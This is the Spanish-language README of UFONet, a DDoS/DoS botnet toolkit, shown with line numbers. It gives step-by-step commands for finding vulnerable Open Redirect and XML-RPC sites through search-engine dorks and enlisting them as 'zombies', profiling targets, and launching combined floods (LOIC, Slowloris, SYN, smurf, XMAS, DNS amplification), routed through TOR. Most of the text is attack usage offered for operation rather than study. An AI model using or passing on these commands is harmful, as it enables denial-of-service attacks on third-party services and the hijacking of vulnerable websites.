LEEME.txt 16 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528
  1. ===========================================================================
  2. 888 888 8888888888 .d88888b. 888b 888 888
  3. 888 888 888 d88PY888b 8888b 888 888
  4. 888 888 888 888 888 88888b 888 888
  5. 888 888 8888888 888 888 888Y88b 888 .d88b. 888888
  6. 888 888 888 888 888 888 Y88b888 d8P Y8b 888
  7. 888 888 888 888 888 888 Y88888 88888888 888
  8. Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
  9. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
  10. ===========================================================================
  11. Bienvenida a UFONet [ DDoS+DoS ] Botnet/C&C/Darknet ;-)
  12. ===========================================================================
  13. ###############################
  14. # Información del proyecto
  15. ###############################
  16. - Website:
  17. https://ufonet.03c8.net
  18. - IRC:
  19. irc.freenode.net - #ufonet
  20. ###############################
  21. # FAQ/Preguntas frecuentes
  22. ###############################
  23. https://ufonet.03c8.net/FAQ.html
  24. ###############################
  25. # Introducción
  26. ###############################
  27. UFONet - es un conjunto de herramientas diseñado para lanzar ataques DDoS y DoS.
  28. En los siguientes enlaces tienes más información:
  29. - CWE-601:Open Redirect:
  30. https://cwe.mitre.org/data/definitions/601.html
  31. - OWASP:URL Redirector Abuse:
  32. https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
  33. ###############################
  34. # Instalando
  35. ###############################
  36. UFONet funciona en muchas plataformas. Requiere Python (>2.7.9) y las siguientes librerías:
  37. python3-pycurl - Python bindings to libcurl (Python 3)
  38. python3-geoip - Python3 bindings for the GeoIP IP-to-country resolver library
  39. python3-whois - Python module for retrieving WHOIS information - Python 3
  40. python3-crypto - cryptographic algorithms and protocols for Python 3
  41. python3-requests - elegant and simple HTTP library for Python3, built for human beings
  42. python3-scapy - Packet crafting/sniffing/manipulation/visualization security tool
  43. Puedes obtener todas las librerías requeridas automáticamente usando:
  44. sudo python setup.py install
  45. Para instalarlas manualmente en sistemas basados en Debian (ex: Ubuntu), lanza:
  46. sudo apt-get install python3-pycurl python3-geoip python3-whois python3-crypto python3-requests python3-scapy
  47. En otros sistemas como: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... también lanzar:
  48. pip install GeoIP
  49. pip install python-geoip
  50. pip install pygeoip
  51. pip install requests
  52. pip install pycrypto
  53. pip install pycurl
  54. pip install whois
  55. pip install scapy-python3
  56. Paquetes fuente de las librerías:
  57. * Python: https://www.python.org/downloads/
  58. * PyCurl: http://pycurl.sourceforge.net/
  59. * GeoIP: https://pypi.python.org/pypi/GeoIP/
  60. * Python-geoip: https://pypi.org/project/python-geoip/
  61. * Pygeoip: https://pypi.org/project/pygeoip/
  62. * Whois: https://pypi.python.org/pypi/whois
  63. * PyCrypto: https://pypi.python.org/pypi/pycrypto
  64. * PyRequests: https://pypi.python.org/pypi/requests
  65. * Scapy-Python3: https://pypi.org/project/scapy-python3/
  66. * Leaflet: http://leafletjs.com/ (provided)
  67. ###############################
  68. # Buscando 'zombies'
  69. ###############################
  70. UFONet puede buscar en los resultados de diferentes motores de búsqueda para encontrar posibles sitios
  71. web vulnerables a 'Open Redirect'.
  72. Generalmente los parámetros de las peticiones, suelen ser similares a los siguientes:
  73. 'proxy.php?url='
  74. 'check.cgi?url='
  75. 'checklink?uri='
  76. 'validator?uri='
  77. Por ejemplo, puedes comenzar una búsqueda con:
  78. ./ufonet -s 'proxy.php?url='
  79. O utilizando una lista de "dorks" que tengas en un fichero:
  80. ./ufonet --sd 'dorks.txt'
  81. Por defecto, UFONet utiliza un motor de búsqueda que se llama 'DuckDuckGo'. Pero puedes elegir uno diferente:
  82. ./ufonet -s 'proxy.php?url=' --se 'bing'
  83. Ésta es la lista de motores de búsqueda que funcionan con la fecha de la última vez que se han probado:
  84. - duckduckgo [01/02/2020: OK!]
  85. - bing [01/02/2020: OK!]
  86. - yahoo [01/02/2020: OK!]
  87. También puedes buscar masívamente utilizando todos los motores de búsqueda soportados:
  88. ./ufonet -s 'proxy.php?url=' --sa
  89. Para controlar cuantos 'zombies' recibir como resultado puedes utilizar:
  90. ./ufonet --sd 'botnet/dorks.txt' --sa --sn 20
  91. O puedes hacer que la herramienta búsque de manera autómatica el mayor número posible de resultados
  92. (ésto puede tardar bastante tiempo!):
  93. ./ufonet --auto-search
  94. Al final del proceso, serás preguntado por si quieres hacer un chequeo, de la lista que has recibido,
  95. para ver si las urls son vulnerables.
  96. Do you want to check if the NEW possible zombies are valid? (Y/n)
  97. Después serás preguntado por si quieres actualizar tu lista de 'zombies' añadiendo solamente
  98. aquellas aplicaciones web que sean vulnerables.
  99. Do you want to update your army? (Y/n)
  100. Si respondes 'Y', tus nuevos 'zombies' se sumarán al fichero: zombies.txt
  101. -------------
  102. Ejemplos:
  103. + con detalle: ./ufonet -s 'proxy.php?url=' -v
  104. + con hilos: ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100
  105. ###############################
  106. # Probando la botnet
  107. ###############################
  108. UFONet puede probar si tus 'zombies' son vulnerables y si pueden ser usados para tareas de ataque.
  109. Por ejemplo, abre 'botnet/zombies.txt' (u otro fichero) y crea una lista de posibles 'zombies'.
  110. Recuerdas que las urls de los 'zombies' deberían ser algo así:
  111. http://objetivo.com/check?uri=
  112. Después de eso, lanza:
  113. ./ufonet -t 'botnet/zombies.txt'
  114. Puedes hacer pruebas para descubrir 'zombies' relacionados con la vulnerabilidad XML-RPC Pingback, mediante:
  115. ./ufonet --test-rpc
  116. Para probar si tus 'zombies' siguen infectados (ésto puede tardar bastante tiempo!):
  117. ./ufonet --test-all
  118. Y para probar si tus 'zombies' siguen conectados a internet:
  119. ./ufonet --test-offline
  120. Finalmente, puedes ordenar a tus 'zombies' que te ataquen a ti mismo, para ver como responden a tus necesidades:
  121. ./ufonet --attack-me
  122. Al final del proceso, serás preguntado por si quieres hacer un chequeo, de la lista que has recibido,
  123. para ver si las urls son vulnerables.
  124. Do you want to check if the NEW possible zombies are valid? (Y/n)
  125. Después serás preguntado por si quieres actualizar tu lista de 'zombies' añadiendo solamente
  126. aquellas aplicaciones web que sean vulnerables.
  127. Do you want to update your army? (Y/n)
  128. Si respondes 'Y', tu fichero: "botnet/zombies.txt" será actualizado.
  129. -------------
  130. Examples:
  131. + con detalle: ./ufonet -t 'botnet/zombies.txt' -v
  132. + con proxy TOR: ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
  133. + con hilos: ./ufonet -t 'botnet/zombies.txt' --threads 50
  134. + probar botnet: ./ufonet --test-all
  135. + probar XML-RPCs: ./ufonet --test-rpc
  136. + buscar 'offlines': ./ufonet --test-offline
  137. + auto-atacarte: ./ufonet --attack-me
  138. ###############################
  139. # Inspeccionando un objetivo
  140. ###############################
  141. UFONet puede buscar el fichero más grande de tu objetivo analizándolo:
  142. ./ufonet -i http://target.com
  143. Puedes utilizar el resultado para hacer tus ataques más efectivos:
  144. ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
  145. -------------
  146. Ejemplo:
  147. +input:
  148. ./ufonet -i http://target.com
  149. +output:
  150. [...]
  151. +Image found: images/wizard.jpg
  152. (Size: 63798 Bytes)
  153. ------------
  154. +Style (.css) found: fonts.css
  155. (Size: 20448 Bytes)
  156. ------------
  157. +Webpage (.php) found: contact.php
  158. (Size: 2483 Bytes)
  159. ------------
  160. +Webpage (.php) found: about.php
  161. (Size: 1945 Bytes)
  162. ------------
  163. +Webpage (.php) found: license.php
  164. (Size: 1996 Bytes)
  165. ------------
  166. ================================================================================
  167. =Biggest File: http://target.com/images/wizard.jpg
  168. ================================================================================
  169. -------------
  170. ###############################
  171. # Abduciendo un objetivo
  172. ###############################
  173. UFONet puede entregarte bastante información interesante de tu objetivo:
  174. ./ufonet -x http://target.com
  175. -------------
  176. Ejemplo:
  177. +input:
  178. ./ufonet -x https://yahoo.com
  179. +output:
  180. [...]
  181. -Target URL: https://yahoo.com
  182. -IP : 206.190.39.42
  183. -IPv6 : OFF
  184. -Port : 443
  185. -Domain: yahoo.com
  186. -Bytes in : 550.09 KB
  187. -Load time: 9.10 seconds
  188. -Banner: ATS
  189. -Vía : http/1.1 usproxy3.fp.ne1.yahoo.com (ApacheTrafficServer),
  190. http/1.1 media-router-fp25.prod.media.ir2.yahoo.com (ApacheTrafficServer [cMsSf ])
  191. -WAF/IDS: FIREWALL NOT PRESENT (or not discovered yet)! ;-)
  192. -Reports:
  193. + CVE-2017-7671 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7671
  194. + CVE-2017-5660 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5660
  195. [...]
  196. ---------
  197. [Info] Abduction finished... ;-)
  198. -------------
  199. ###############################
  200. # Atacando un objetivo
  201. ###############################
  202. UFONet puede atacar a tus objetivos de muchas maneras.
  203. Por ejemplo, introduce un objetivo para atacar con un número de rondas:
  204. ./ufonet -a http://target.com -r 10
  205. En el ejemplo, UFONet atacará el objetivo un número de 10 veces por cada 'zombie'. De manera que si tienes una lista
  206. de 1.000 'zombies', lanzará 1.000 'zombies' x 10 rondas = 10.000 peticiones al objetivo.
  207. Por defecto se aplicará únicamente 1 ronda.
  208. Además, puedes elegir el lugar para recargar el sitio el objetivo. Por ejemplo, una imagen grande, un fichero que ocupe
  209. mucho o una película de flash. En algunos escenarios donde los objetivos no utilizan sistemas de cache, ésto hará tu
  210. ataque más efectivo.
  211. ./ufonet -a http://target.com -b "/images/big_size_image.jpg"
  212. -------------
  213. Examples:
  214. + con detalle: ./ufonet -a http://target.com -r 10 -v
  215. + con proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
  216. + con un lugar ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
  217. + con hilos: ./ufonet -a http://target.com -r 10 --threads 500
  218. ###############################
  219. # Ataques Especiales
  220. ###############################
  221. UFONet utiliza diferentes maneras para explotar las vulnerabilides 'Open Redirect'.
  222. Puedes usar UFONet para estresar la base de datos de tu objetivo mediante la petición de cadenas aleatorias válidas
  223. como si fueran búsquedas:
  224. ./ufonet -a http://target.com --db "search.php?q="
  225. También explota (por defecto) una vulnerabilidad en XML-RPC Pingback, generando peticiones que requieren respuesta e
  226. incrementando el procesamiento que requiere el objetivo.
  227. Puedes probar tu lista de zombies "X-RPCs" lanzando:
  228. ./ufonet --test-rpc
  229. Al mismo tiempo, puedes conectar LOIC (con soporte para proxy), para hacer un número determinado de peticiones
  230. recursivas directamente sobre tu objetivo:
  231. ./ufonet -a http://target.com --loic 100
  232. Puedes conectar LORIS para hacer peticiones que dejen hilos abiertos en tu objetivo, haciendo que el servidor web
  233. se vuelva lento:
  234. ./ufonet -a http://target.com --loris 100
  235. Y también puedes conectar UFOSYN (requiere acceso mediante 'root') para comenzar un poderoso ataque de inundación TCP/SYN:
  236. sudo python ufonet -a http://target.com --ufosyn 100
  237. O hacer un ataque SPRAY ('root' requerido) para lanzar una Denegación de Servicio Distribuída y Reflejada (DrDoS):
  238. sudo python ufonet -a http://target.com --spray 100
  239. Un ataque SMURF ('root' requerido) para enviar paquetes de 'Propagación' ICMP de manera distribuída:
  240. sudo python ufonet -a http://target.com --smurf 101
  241. O un ataque XMAS ('root' requerido) que inundará tu objetivo con paquetes 'Árbol de Navidad':
  242. sudo python ufonet -a http://target.com --xmas 101
  243. Un ataque STARVATION ('root' requerido) que tumbará tu objetivo en segundos, si éste no tiene un mínimo nivel de protección:
  244. sudo python ufonet -a http://target.com --nuke 10000
  245. O un ataque TACHYON ('root' requerido) para realizar una amplificación distribuída del tráfico DNS:
  246. sudo python ufonet -a http://target.com --tachyon 1000
  247. Todos los ataques pueden ser combinados haciendo que UFONet utilice distintas técnicas de DDoS y DoS, al mismo tiempo:
  248. python ufonet -a http://target.com --loic 100 --loris 100
  249. sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100 --spray 100 --smurf 101 --xmas 101 --nuke 10000 --tachyon 1000
  250. ###############################
  251. # Actualizando
  252. ###############################
  253. UFONet implementa una opción para actualizarse automáticamente a la última versión estable.
  254. Para poder hacerlo tienes que haber clonado la herramienta desde el repositorio de GitHub.
  255. Lanza el siguiente comando para chequear si necesitas actualizaciones:
  256. ./ufonet --update
  257. Ésto actualizará la herramienta automáticamente borrando todos los ficheros del anterior paquete.
  258. ###############################
  259. # Generando un 'Blackhole'
  260. ###############################
  261. UFONet tiene algunas opciones P2P para compartir/mantener 'zombies' con otras 'naves madre".
  262. * Configura un servidor web con una carpeta llamada "ufonet", con las siguientes características:
  263. - localizado en /var/www/ufonet (por defecto en debian/ubuntu)
  264. - creado por el mismo usuario que ejecuta el "agujero negro" (blackhole)
  265. - que sea accesible desde http://tu-ip/ufonet/
  266. * Comienza el "agujero negro" con: ./ufonet --blackhole (or python2 blackhole.py)
  267. * Cualquiera que quiera conectarse con tu servidor necesita configurar --up-to/--down-from con la ip
  268. de tu servidor web...
  269. [!]ATENCIÓN : ésta función "AVANZADA" puede "NO" ser segura, ejecútala si realmente lo necesitas.
  270. Para lanzar un nuevo "agujero negro", utiliza:
  271. ./ufonet --blackhole
  272. ###############################
  273. # GUI/Web Interface
  274. ###############################
  275. Puedes controlar UFONet utilizando una interfaz Web. La herramienta implementa un servidor web en python
  276. conectado al núcleo para que tengas unas experiencia más amigable.
  277. Para lanzarla usa:
  278. ./ufonet --gui
  279. Ésto abrirá una pestaña (o una ventana nueva) en tu navegador por defecto, con todas las opciones de la herramienta
  280. más algunas "extra":
  281. - NEWS: Permite leer las últimas "noticias" publicadas por la "nave madre"
  282. - MISSIONS: Permite leer las últimas "misiones" publicadas por la "nave madre"
  283. - SHIP STATS: Permite consultar las estadísticas de tu "nave"
  284. - RANKING: Permite consultar tu posición en el "ranking"
  285. - BOARD: Permite enviar/recibir mensajes con una "nave madre" (un foro)
  286. - WARPS: Permite interactuar con una "nave madre" para subir/bajar 'zombies'
  287. - GLOBAL GRID: Permite revisar las estadísticas de otras "naves"
  288. - WARGAMES: Permite proponer y participar en algunos "juegos de guerra" reales
  289. ###############################
  290. # Timelog
  291. ###############################
  292. --------------------------
  293. 01.02.2020 : v.1.4
  294. --------------------------
  295. --------------------------
  296. 10.03.2019 : v.1.3
  297. --------------------------
  298. --------------------------
  299. 03.02.2019 : v.1.2.1
  300. --------------------------
  301. --------------------------
  302. 31.12.2018 : v.1.2
  303. --------------------------
  304. --------------------------
  305. 26.09.2018 : v.1.1
  306. --------------------------
  307. --------------------------
  308. 08.03.2018 : v.1.0
  309. --------------------------
  310. --------------------------
  311. 14.07.2017 : v.0.9b
  312. --------------------------
  313. --------------------------
  314. 21.10.2016 : v.0.8b
  315. --------------------------
  316. --------------------------
  317. 17.08.2016 : v.0.7b
  318. --------------------------
  319. --------------------------
  320. 05.11.2015 : v.0.6b
  321. --------------------------
  322. --------------------------
  323. 24.05.2015 : v.0.5b
  324. --------------------------
  325. --------------------------
  326. 15.12.2014 : v.0.4b
  327. --------------------------
  328. --------------------------
  329. 27.09.2014 : v.0.3.1b
  330. --------------------------
  331. --------------------------
  332. 20.09.2014 : v.0.3b
  333. --------------------------
  334. --------------------------
  335. 22.06.2013 : v.0.2b
  336. --------------------------
  337. --------------------------
  338. 18.06.2013 : v.0.1b
  339. --------------------------
  340. ###############################
  341. # Gracias a
  342. ###############################
  343. - UFo & Mandingo & Ikujam
  344. - Phineas Fisher ;-)
  345. - The Shadow Brokers (TSB) ;_)
  346. - World Wide Antifas >-)
  347. ------------------------
  348. ############